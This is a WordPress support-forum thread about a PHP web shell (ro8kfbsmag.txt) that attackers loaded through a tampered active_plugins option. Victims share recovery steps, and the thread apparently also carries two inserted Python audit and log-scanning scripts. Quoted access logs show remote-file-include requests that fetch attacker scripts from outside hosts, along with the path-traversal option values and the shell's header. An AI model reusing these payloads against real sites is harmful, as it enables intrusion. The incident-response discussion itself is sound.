WordPress.org

Forums

Weird and Dangerous : ro8kfbsmag.txt (47 posts)

  1. SimonJ
    Member
    Posted 6 years ago #

    Well, I don't know where to post this question.

    LAST WEEK, I had a big problem on my WordPress installation. All the plugins were disabled and all the "attachment" posts' status had changed to "post"... As a result, I saw no upload files via the admin browser.

    After a short investigation, I saw that the last post in the database had only "ro8kfbsmagtxt" for content...

    I was able to repair the site by using a backup on my server.

    YESTERDAY, I was browsing via SSH on my server and I found in the TMP folder a file called "ro8kfbsmag.txt"... Hum hum. I downloaded it, and it's a PHP script, with a form, and with the title: "Magic Include Shell by Mag icq 884888"

    Well, I don't like it... :-o

    Here is the content of the file... If any WP guru could take care of it, it sounds dangerous to me...

    S.

    ---------- ro8kfbsmag.txt ---------------

    <?php
    /*Magic Include Shell by Mag icq 884888*/
    //TODO: dump the file to own FTP (!), working with dirs (.), renaming files (?), sending POST, GET, cookies via sockets (!!!)
    $ver='1.6';
    if(isset($_GET[pizdecnax]))
    {
    ...

    Large PHP code removed by moderator. You can find this file via google, if you want.

  2. smithdan
    Member
    Posted 6 years ago #

    This also happened to my wordpress blog. The plugins were all disabled, the pages showed up as posts, and the admin password was changed.

    The attacker was also able to upload a new theme in the wp-content dir. They were also able to explore the file system using the 'dira' parameter.

    The same ro8kfbswmag.txt was placed in /tmp/

    The initial attack showed up in the access logs:

    dan.smith.name 82.103.135.182 - - [05/Nov/2007:09:33:29 -0600] "GET / HTTP/1.0" 200 38326 "-" "Opera/9.23 (Windows NT 5.1; U; ru)" 195 38635
    dan.smith.name 82.103.135.182 - - [05/Nov/2007:09:35:31 -0600] "GET /?piska HTTP/1.0" 200 8423 "http://localhost/wp-toolz/?mode=shell&what=2122" "Opera/9.23 (Windows NT 5.1; U; ru)" 259 8671
    dan.smith.name 82.103.135.182 - - [05/Nov/2007:09:35:50 -0600] "POST /index.php?piska&dira=./ HTTP/1.0" 200 8774 "http://dan.smith.name/?piska" "Opera/9.23 (Windows NT 5.1; U; ru)" 364 9022

    Please let me know if you need any additional information, and advise.

  3. moshu
    Member
    Posted 6 years ago #

    1. Alert your host! - it might be that the hacker got access to the server elsewhere...
    2. Do NOT have any files left world writable (chmod 666) - like when editing theme files online.
    3. Change all your passwords.
    4. UPGRADE!

  4. SimonJ
    Member
    Posted 6 years ago #

    Many Thanks Moshu for your answer.

    The host is me... :-) It's my own server; the site generated too much traffic and server load for a "standard host", so I bought my own server and I'm now on my own. I alerted the sysadmin I hire for the server and I gave him a copy of the "ro8kfbswmag.txt" file.

    I can't find any logs like those posted by smithdan, but I see some weird entries a little while before the attack, and on the same day, from a Korean ISP:

    The days before:
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 302 293
    220.120.22.131 - - [21/Oct/2007:22:45:29 -0400] "GET http://91pinker.com/prx.php HTTP/1.0" 302 293

    The same day:
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 404 -
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 302 293
    220.120.22.131 - - [23/Oct/2007:23:12:49 -0400] "GET http://135531.com/prx.php HTTP/1.0" 302 293

    If you take a look at the first domain : http://91pinker.com/prx.php

    Or the root :
    http://91pinker.com/

    It seems to be a PHP proxy... Well... At this point, I really don't have the knowledge to figure anything out, but it looks weird and dangerous. ;-) The second domain is different (135531.com) but it uses the same prx.php...

    ------------------
    Anyway, I hope that posting this info here will be helpful for the WordPress community and the WordPress team to determine the nature of this "exploit" and whether it bears on a security hole in WP. If I can be of any help with more information, just let me know!

    ------------------

    Thanks again Moshu for your advice... As you suggested, I changed ALL my passwords, everywhere, on the server and on the WP admin accounts. I haven't had any other problem since.

    I know that I'm ready for an upgrade, but the site is really heavy and I'll have to work around some theme and plugin problems before doing so. ;-)

    Thanks again.

    S.

  5. SimonJ
    Member
    Posted 6 years ago #

    Oh! And I forgot...

    The problem description by DanSmith was exactly the same for me: "The plugins were all disabled, the pages showed up as posts, and the admin password was changed."

    S.

  6. DavidHolder
    Member
    Posted 6 years ago #

    I have experienced this problem too and have some more information and another solution.

    The sequence of events was as follows (unfortunately my logs don't record POST data):

    1. POST /wp-admin/admin-ajax.php
    2. POST /wp-admin/options.php
    3. POST /wp-admin/options.php
    4. POST /wp-admin/options.php
    5. POST /wp-admin/options.php
    6. POST /wp-admin/options.php
    7. POST /wp-admin/options.php
    8. POST /wp-admin/upload.php?style=inline&tab=upload&post_id=-1
    9. POST /wp-admin/options.php
    10. POST /wp-admin/options.php
    11. GET /wp-admin/upgrade.php?step=1
    12. GET /?kreved
    13. GET /index.php?kreved&dira=./wp-content
    14. GET /index.php?kreved&&dira=./wp-content/uploads
    15. POST /index.php?kreved&&dira=./wp-content/uploads
    16. GET /wp-content/uploads/
    17. GET wp-content/uploads/zip.php

    After this the hacker uploaded lots of nasty stuff as zip files into the /wp-content/uploads/ directory. The hacker did this using the backdoor mentioned in an earlier post. The backdoor is configured within WordPress as a plugin and is referenced by the URL /?kreved. This executes the file that has been uploaded by the hacker into /tmp. The file is called ro8kbsmag.txt.

    After carefully checking my wordpress files (using checksums against a clean install) I determined that the hacker had not changed any of the standard files.

    What the hacker had done is modify two options in the database, specifically upload_path and active_plugins.

    Upload_path was set to /../../../../../../../../../../../../../../../../../tmp and active_plugins to a:1:{i:0;s:69:"/../../../../../../../../../../../../../../../../../tmp/ro8kbsmag.txt";}.

    Setting these back to their default values fixed my installation.

    To stop the hacker doing it again I added web server access controls to the wp-admin directory. This extra layer of security should stop them getting in again.
    It would be nice to know what the POST data was that allowed the hacker to do this. Has anyone else captured this?

    David
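    The two database values David describes (an upload_path that climbs to /tmp and an active_plugins entry pointing at a file outside wp-content/plugins) are easy to audit mechanically. The script below is an added example, not code from this thread or from WordPress: it parses the PHP-serialized active_plugins value and flags both kinds of tampering. The site root /var/www/wp and the sample option values are constructed assumptions modelled on the ones quoted above.

```python
"""Audit two wp_options values for the tampering described in this thread.

Added example (not from the thread or WordPress). Parses the
PHP-serialized active_plugins value and flags entries that escape
wp-content/plugins, plus an upload_path that resolves outside the site.
"""
import posixpath
import re
from typing import Dict, List


def parse_active_plugins(serialized: str) -> List[str]:
    """Parse a PHP serialized array of strings, e.g. a:1:{i:0;s:11:"akismet.php";}."""
    m = re.match(r'a:(\d+):\{(.*)\}$', serialized, re.S)
    if not m:
        raise ValueError("not a serialized PHP array")
    count, body = int(m.group(1)), m.group(2)
    plugins, pos = [], 0
    for _ in range(count):
        km = re.match(r'i:\d+;s:(\d+):"', body[pos:])  # integer key, string header
        if not km:
            raise ValueError("unexpected element at offset %d" % pos)
        length = int(km.group(1))  # PHP stores the declared byte length
        start = pos + km.end()
        value = body[start:start + length]
        if body[start + length:start + length + 2] != '";':
            raise ValueError("declared length does not match the string")
        plugins.append(value)
        pos = start + length + 2
    return plugins


def audit_active_plugins(serialized: str) -> List[str]:
    """WordPress includes each entry relative to wp-content/plugins, so
    a leading slash or any '..' component means the include leaves that tree."""
    findings = []
    for entry in parse_active_plugins(serialized):
        if entry.startswith('/') or '..' in entry.split('/'):
            findings.append("active_plugins escapes wp-content/plugins: %r" % entry)
        elif not entry.endswith('.php'):
            findings.append("active_plugins entry is not a .php file: %r" % entry)
    return findings


def audit_upload_path(upload_path: str, site_root: str = '/var/www/wp') -> List[str]:
    """Flag an upload_path that resolves outside the site root (assumed path)."""
    if upload_path in ('', 'wp-content/uploads'):  # the defaults
        return []
    resolved = posixpath.normpath(posixpath.join(site_root, upload_path))
    if not resolved.startswith(site_root.rstrip('/') + '/'):
        return ["upload_path resolves outside the site: %s -> %s" % (upload_path, resolved)]
    return []


def audit_wp_options(options: Dict[str, str]) -> List[str]:
    """Run both checks over a dict of option_name -> option_value."""
    findings = audit_upload_path(options.get('upload_path', ''))
    findings += audit_active_plugins(options.get('active_plugins', 'a:0:{}'))
    return findings


# Constructed samples: the tampered values quoted in this thread, and a clean set.
SHELL_PATH = '/' + '../' * 17 + 'tmp/ro8kbsmag.txt'
TAMPERED = {
    'upload_path': '/' + '../' * 17 + 'tmp',
    'active_plugins': 'a:1:{i:0;s:%d:"%s";}' % (len(SHELL_PATH), SHELL_PATH),
}
CLEAN = {
    'upload_path': 'wp-content/uploads',
    'active_plugins': 'a:1:{i:0;s:19:"akismet/akismet.php";}',
}

if __name__ == '__main__':
    for label, opts in (('tampered', TAMPERED), ('clean', CLEAN)):
        print(label, audit_wp_options(opts) or ['no findings'])
```

Feed it the two rows from `SELECT option_name, option_value FROM wp_options WHERE option_name IN ('upload_path','active_plugins')`; an empty result means both values look like defaults.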

  7. Jeremy Clark
    Moderator
    Posted 6 years ago #

    You said yourself that the whole reason the hacker was able to do anything was because they modified your database. You need to secure that. Change the password and username for the database. If you're hosting yourself, don't allow TCP connections from outside to the MySQL port; better yet, disable the port altogether, it's not needed when WP and the database are on the same server. Lastly, make sure that your wp-config.php file has the correct permissions.

  8. DavidHolder
    Member
    Posted 6 years ago #

    No. The hacker changed the settings in the wp_options database table via WordPress, not via SQL. The database port is disabled (and firewalled, since I am paranoid) and only allows access from localhost. Since I don't have the POST data I cannot determine exactly how the hacker managed to change entries in wp_options. But what the traces do show is that it was done through a process of repeated POSTs, first to admin-ajax.php, then options.php, upload.php, options.php and finally upgrade.php.

    You are correct to suggest changing the passwords, which I had done but not mentioned. The hacker did not change these, but they did have access to the database and config file through the hack and therefore would have been able to take a copy of the passwords.

    David

  9. RCanine
    Member
    Posted 6 years ago #

    Just had this happen to my WP install. Please keep this thread updated.

  10. joepie91
    Member
    Posted 6 years ago #

    This text file you mentioned is a shell. The hacker probably uploaded it through an exploit in WordPress (or just bruteforced the admin account) and uploaded a shell. A shell is used to have easy remote access to databases and files. It's actually just a trojan/backdoor for a web server.
    It's best to try to find out where the exploit is, and how you could remove it. Also, you should report the exploit to the WordPress team, and wait for a fix, or write one yourself if you're skilled enough. If you got any questions, e-mail me at jamsoftgamedev@gmail.com.

    Good luck.

  11. whooami
    Member
    Posted 6 years ago #

    that's a standard PHP include attack -- it does NOT require anyone to brute force the admin account.

    Furthermore, Google's cache of ryancannon.com as of Dec 24 shows you running 2.2.1. That pretty much covers the "how did they do it".

  12. Shaliza
    Member
    Posted 6 years ago #

    I did a Google search & some site came up about it, but most of it is in a different language.

    I'm glad this doesn't affect 2.3.1

  13. ontrack
    Member
    Posted 6 years ago #

    This also happened to my site. I'm no programmer, but the explanation of this particular hack on the url below appears to be a good one:

    http://blog.taragana.com/index.php/archive/detailed-post-mortem-of-a-website-hack-through-wordpress-how-to-protect-your-wordpress-blog-from-hacking/

  14. begtognen
    Member
    Posted 6 years ago #

    This happened to me as well. I checked my database and found this:

    Upload_path was set to /../../../../../../../../../../../../../../../../../tmp and active_plugins to a:1:{i:0;s:69:"/../../../../../../../../../../../../../../../../../tmp/ro8kbsmag.txt";}.

    The solution above says: "Setting these back to their default values fixed my installation."

    What are the default values?

    Thanks much.

  15. sandynata
    Member
    Posted 6 years ago #

    What are the default values?

    wp-content/uploads

    FYI, just go to Option > Miscellaneous

  16. daniel.phiinx
    Member
    Posted 6 years ago #

    I did as you suggested, it worked. Now what I need to know is, is there anything besides the MySQL post_type tag which differentiates pages from posts (so I could automate restoration)?

  17. daniel.phiinx
    Member
    Posted 6 years ago #

    Nevermind what i said before, I figured it out.
    If you pass the following SQL query to the database it should correct the pages/posts damage.

    In SQL:

    UPDATE wp_posts
    SET post_type = 'page'
    WHERE menu_order<>'0'

    In PHP:

    $sql = 'UPDATE wp_posts'
    . ' SET post_type = \'page\''
    . ' WHERE menu_order<>\'0\''
    . ' ';

  18. saphod
    Member
    Posted 6 years ago #

    Same happened to me today. After typing in the URL of my weblog, I just saw a lot of error messages, which included something like "permission denied" and "/../ (...) /tmp/ro8kbsmag.txt". Site Layout was totally messed up, only one page was showing in the page menu.

    Took a further look into the database - same things as mentioned above. Pages were converted to posts, and I even saw posts that were supposed to be links to uploaded pictures...

    I replaced the database with a backup and now everything is fine. Guess I will have to update soon, that's why my site is now in maintenance mode.

    Thanks for your help, pals!

  19. saphod
    Member
    Posted 6 years ago #

    [Update]

    My webhost told me that it was injected using a vulnerability in wp-pass.php, also see

    http://seclists.org/bugtraq/2007/Jul/0039.html and e.g.

    http://mou.me.uk/2008/02/13/hackers-attempting-to-exploit-a-wordpress-vulnerability-using-wp-pass-php/

    http://trac.wordpress.org/ticket/4606

    Here's a logfile excerpt:

    ----------
    http://www.saphod.net***201.43.55.205 - - [27/Mar/2008:01:48:41 +0100] "GET //wp-pass.php?_wp_http_referer=http://www.freewebs.com/haddem/phpbot.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    http://www.saphod.net***81.86.41.163 - - [27/Mar/2008:02:43:48 +0100] "GET /wp-pass.php?_wp_http_referer=http://freewebs.com/diegoxfelix/ch.txt?? HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    http://www.saphod.net***72.4.241.28 - - [27/Mar/2008:02:54:08 +0100] "GET //wp-pass.php?_wp_http_referer=http://www.xsenharox.xpg.com.br/suvbni HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    http://www.saphod.net***72.4.241.28 - - [27/Mar/2008:04:00:53 +0100] "GET //wp-pass.php?_wp_http_referer=http://xsenharox.xpg.com.br/suvbni? HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    ----------

    This seems to be a known bug.

    My host replied I could suppress this behaviour by the following lines in .htaccess:

    ----------
    RewriteEngine On

    RewriteCond %{REQUEST_URI} (.*)wp-pass.php(.*) [NC]
    RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
    RewriteRule ^(.*) - [F]
    -----------

    For this, also see:
    http://wp.dembowski.net/2007/07/10/htaccess-to-prevent-wp-passphp-redirects/

    Well, I am not a Rewrite guru... would WP still work after this? Anyway, I should update... is this patched in 2.3.3?
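    Both request shapes quoted in this thread (the wp-pass.php redirects above, and the earlier index.php?marker&dira= directory listings from smithdan's and David's logs) can be picked out of an access log after the fact. The scanner below is an added example, not code from this thread or from WordPress; it applies the same condition as the .htaccess rule (wp-pass.php with an http URL in the query) plus the dira= check. The log lines are constructed, with documentation IPs and example.org standing in for the attacker-controlled hosts.

```python
"""Flag the two request patterns quoted in this thread in an Apache access log.

Added example (not from the thread or WordPress). Reports (1) wp-pass.php
hits whose _wp_http_referer is an absolute URL and (2) shell directory
browsing via a bare marker key plus dira=.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl

# Combined log format, with an optional leading vhost field as in the excerpts.
LOG_RE = re.compile(
    r'^(?:\S+ )?(?P<ip>\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\S+)'
)


def classify(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (ip, reason, target) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group('target')
    # Split by hand: urlsplit would read the "//wp-pass.php" form as a host.
    path, _, query = target.partition('?')
    params = parse_qsl(query, keep_blank_values=True)  # skips the empty "&&" pair
    # (1) wp-pass.php redirecting to an external URL (what the .htaccess rule blocks)
    if path.endswith('/wp-pass.php'):
        for key, value in params:
            if key == '_wp_http_referer' and re.match(r'https?://', value, re.I):
                return (m.group('ip'), 'wp-pass.php redirect to external URL', target)
    # (2) index.php?<marker>&dira=<dir>: directory listing through the included shell
    if any(key == 'dira' for key, _ in params):
        return (m.group('ip'), 'shell directory listing (dira=)', target)
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Classify every line and keep only the hits."""
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample lines modelled on the excerpts in this thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Nov/2007:09:33:29 -0600] "GET / HTTP/1.0" 200 38326 "-" "Opera/9.23"',
    '192.0.2.10 - - [05/Nov/2007:09:35:31 -0600] "GET /?piska HTTP/1.0" 200 8423 "-" "Opera/9.23"',
    '192.0.2.10 - - [05/Nov/2007:09:35:50 -0600] "POST /index.php?piska&dira=./ HTTP/1.0" 200 8774 "-" "Opera/9.23"',
    'www.example.net 192.0.2.20 - - [27/Mar/2008:01:48:41 +0100] "GET //wp-pass.php?_wp_http_referer=http://example.org/phpbot.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '192.0.2.30 - - [27/Mar/2008:02:00:00 +0100] "GET /wp-pass.php?_wp_http_referer=/wp-admin/post.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '192.0.2.40 - - [27/Mar/2008:02:05:00 +0100] "GET /index.php?kreved&&dira=./wp-content/uploads HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, reason, target in scan(SAMPLE_LOG):
        print(ip, reason, target)
```

A legitimate wp-pass.php request carries a site-relative referer (the fifth sample line) and is not reported, which is also why the rewrite rule only matches "=http".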

  20. macsoft3
    Member
    Posted 6 years ago #

    >the admin password was changed

    I would trash that user account because they already know the username and create a new admin account.

  21. saphod
    Member
    Posted 6 years ago #

    Today, I noticed that my header.php and footer.php must have been altered: there were some strange spam links in the (generated) HTML-code of my site within a DIV-container that had the attribute "hidden".

    That must have slipped my mind while upgrading my WP installation: of course, my (custom) theme templates were NOT upgraded.

    Thank God the code was not (X)HTML-valid: I found it while validating. :-)

    That also seems to have been done by the hack, so make sure you check your theme files are OK.

  22. saphod
    Member
    Posted 6 years ago #

    OK, I took a further look at those links that appeared in my hacked footer.php. ALL OF THEM lead to a domain called http://www.rashmisinha.com. That looks like a normal blog, but now, try this (this is just for presentation purposes, not supposed for spamming reasons here):

    http://www.rashmisinha.com/archive/rams/9/919588447.html

    This leads to tablets-city.com!!!

    Is this another exploit?

    I tried to contact the blog author of http://www.rashmisinha.com, but found no contact details. Apparently, she is a cofounder of slideshare.net. Can anyone with an account there write on her wall? It seems like her server was turned into a zombie.

    Couldn't find anything on the net for "archive/rams/..."

  23. hockeymonkey
    Member
    Posted 6 years ago #

    I got hit with this, too, and I have a couple of questions.

    Does WordPress issue security bulletins? It would be nice to have a central clearing house (with an RSS feed or e-mail list) for information on this kind of exploit, including exactly which versions are affected, and all the steps needed to a) close the vulnerability and b) repair the damage. Maybe this exists and I don't know about it?

    I *think* I've both closed the hole and repaired the damage (or most of it; still haven't converted my pages back to pages), but I may have missed something.

    Thanks!

  24. Storyman
    Member
    Posted 6 years ago #

    Would the posters who have been hit by this hack please post which version of WordPress they are running.

    Is this particular hack something that has been fixed in WP 2.5?

  25. whooami
    Member
    Posted 6 years ago #

    while it might seem valuable to know what versions someone was running, in the end it's useless information

    Why?

    Because so many upgrades end up not being complete.. as evidenced by the hundreds of posts on here where someone missed upgrading a file, etc.. Ideally, someone is going to have all 2.5 files, or all 2.3.3 files, or .. or .. but some don't.

    Next, because someone discovers something running 2.5, or 2.3.3, doesn't necessarily mean that that version is insecure. It may very well mean that the owner upgraded from a version that had been previously exploited, but didn't know ..

    I have working examples. A previously exploited site that I set up logging on .. They had been running 2.1 something or 2.2 (I don't remember which). We upgraded them to 2.3.3, changing the only admin password in the process. It took only a matter of an hour or so before said exploiter came back and tried to "insert content" into a post. Failing to do so, they immediately attempted an old, but very public SQL exploit that had been used to get the admin password. That didn't work either, obviously, since they were no longer running the older exploitable version.

    In other words, they already had the admin password from the blog being previously exploitable. They were going to be able to continue exploiting, until the password was changed. There was also no telling how long that previous admin password had been compromised, but it had probably been so for a while.

    Had it NOT been for the logging of all of this, and had the password not been changed, it would have outwardly have appeared as if 2.3.3 was vulnerable.

    Follow?

    The other factor is the PHP rootshell aspect of this. A good deal of people simply don't pay attention to the files to realize immediately when a rootshell was uploaded.

    Tack on insecure plugins..
    Tack on using other insecure web apps that don't get upgraded -- joomla, coppermine, and gallery come to mind immediately in that regard.

    ---

    Is this particular hack something that has been fixed in WP 2.5?

    You make a misguided assumption in that question. Nothing indicates that 2.3.3 is, prima facie, insecure. Therefore, it follows that there is nothing to fix in 2.5.

    --

    if you are paranoid, set up logging. Watch what happens to your blog.

    http://www.village-idiot.org/archives/2008/04/03/wordpress-capturing-_post-requests/

    -- Lastly, as an addendum, ro8kfbsmag.txt is a PHP rootshell. Left unnoticed on ANY web site, it does not matter what version of anything someone is using. Called directly, the file provides access to just about any shell command (at least those that PHP has access to). You could have fort fricken knox installed and they would still have a way in. Well, that's not entirely true, but you get the idea.

  26. Storyman
    Member
    Posted 6 years ago #

    Whooami,

    Thanks for the info and the link to capturing POST requests (it is now installed).

  27. nitro2k01
    Member
    Posted 6 years ago #

    I was recently struck by this as well, and here is what I did:

    1. I backed up the blog (I exported XML from within WP, and SQL from phpMyAdmin)
    2. I deleted my old version and installed a fresh, up to date WP instance
    3. Then I re-imported the blog structure (XML)

    Apparently I thought my pages were gone, until I discovered they were just downgraded to posts. That means my pages were indeed saved in the XML export, but without the menu_order attribute, since WP thought they were posts.
    No problem, since post_parent was still saved in the XML, even for posts. So I did this to convert the posts into pages:

    UPDATE wp_posts
    SET post_type = 'page'
    WHERE
    post_parent !=0

    WP still wouldn't list them, so what I did then was to edit them using page.php?action=edit&post=xx which made them show up in the listing and work correctly from the index.php as well. What I'm wondering now is, do I have to do anything more than that to fully convert a post into a page?

  28. K3200
    Member
    Posted 6 years ago #

    I've had this problem occur twice in the same 3 week period. And yes, I am in the midst of trying to upgrade to 2.5 now. My site is currently using 2.1.

    The first time this happened I followed instructions from the forum and everything worked great. This last time (today) I did the same things, and everything now works great except the following error at the top of my blog.

    Warning: include_once(/public_html/wp-content/plugins//../../../../../../../../../../../../../../../../../tmp/ro8kfbsmag.txt) [function.include-once]: failed to open stream: Permission denied in /public_html/wp-settings.php on line 205

    Warning: include_once() [function.include]: Failed opening '/public_html/wp-content/plugins//../../../../../../../../../../../../../../../../../tmp/ro8kfbsmag.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /public_html/wp-settings.php on line 205

    What do I do to fix this?

    I deleted the file ro8kfbsmag.txt, switched all my pages from posts back to pages and changed the upload location back to default. I can post and my blog works fine, it just has this error message and everything looks like crap.

    Thanks!

    P.S. The domain is http://www.crookedpitch.com

  29. whooami
    Member
    Posted 6 years ago #

    you're getting that error because something is trying to include that file. LOOK at the error.

    In other words, there is still malicious code in your files.

  30. saphod
    Member
    Posted 6 years ago #

    Check your database, table "wp_options" and look for the option name "active_plugins". I think I remember that it was changed to contain the path to that ro8kfbsmag.txt. If it does, just set the value blank and reactivate your plugins. That should work. But do not forget to backup your DB first.

    Also, look at your theme's header.php and footer.php to see if they contain any suspicious links at the top or bottom!

Topic Closed

This topic has been closed to new replies.